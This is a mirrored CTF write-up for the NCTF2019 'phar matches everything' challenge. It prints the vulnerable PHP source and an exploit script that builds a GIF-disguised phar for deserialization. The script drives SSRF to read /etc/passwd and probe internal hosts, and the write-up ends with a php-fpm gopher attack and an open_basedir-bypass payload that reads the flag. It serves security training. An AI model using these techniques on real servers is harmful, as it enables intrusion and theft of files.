1
[NCTF2019]phar matches everything
source link: https://yanmymickey.github.io/2020/05/02/CTF_WP/%5BNCTF2019%5Dphar%20matches%20everything/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
[NCTF2019]phar matches everything
[NCTF2019]phar matches everything
源码
<?php
class Easytest{
protected $test;
public function funny_get(){
return $this->test;
}
}
class Main {
public $url;
public function curl($url){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$output=curl_exec($ch);
curl_close($ch);
return $output;
}
public function __destruct(){
$this_is_a_easy_test=unserialize($_GET['careful']);
if($this_is_a_easy_test->funny_get() === '1'){
echo $this->curl($this->url);
}
}
}
if(isset($_POST["submit"])) {
$check = getimagesize($_POST['name']);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
} else {
echo "File is not an image.";
}
}
?>
两次序列化
第一个是利用getimagesize($file_path)
触发phar
反序列化,触发的反序列化影响Main类
第二个很简单,要是Easytest
中的test=1
利用curl
读取文件
exp.php
<?php
class Easytest {
protected $test = '1';
}
class Main {
public $url ='file:///etc/passwd';
}
$a = new Easytest();
echo serialize($a);
echo urlencode(serialize($a));
$b = new Main();
@unlink("exp.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('GIF89a' . "<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
rename('exp.char', "exp.gif");
首先上传exp.gif
然后利用catchmime.php
传参触发反序列化
careful
用来触发2
name`用来触发`phar
改变url
读取hosts,因为这道题想让我们打内网
我读取到了173.187.197.10
,再用http协议读一下http://173.187.197.10
,发现就是当前页面,再读一下 http://173.187.197.11
php-fpm未授权漏洞
使用链接中的exp
再使用gopher
协议使用exp生成的payload
先打phpinfo();
可以得知需要绕过open_basedir
加上绕过open_basedir
的payload就可以了
<?php mkdir('/tmp/fuck');chdir('/tmp/fuck');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));readfile('/flag');?>
flag在根目录
Reference
Buy me a coffee
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK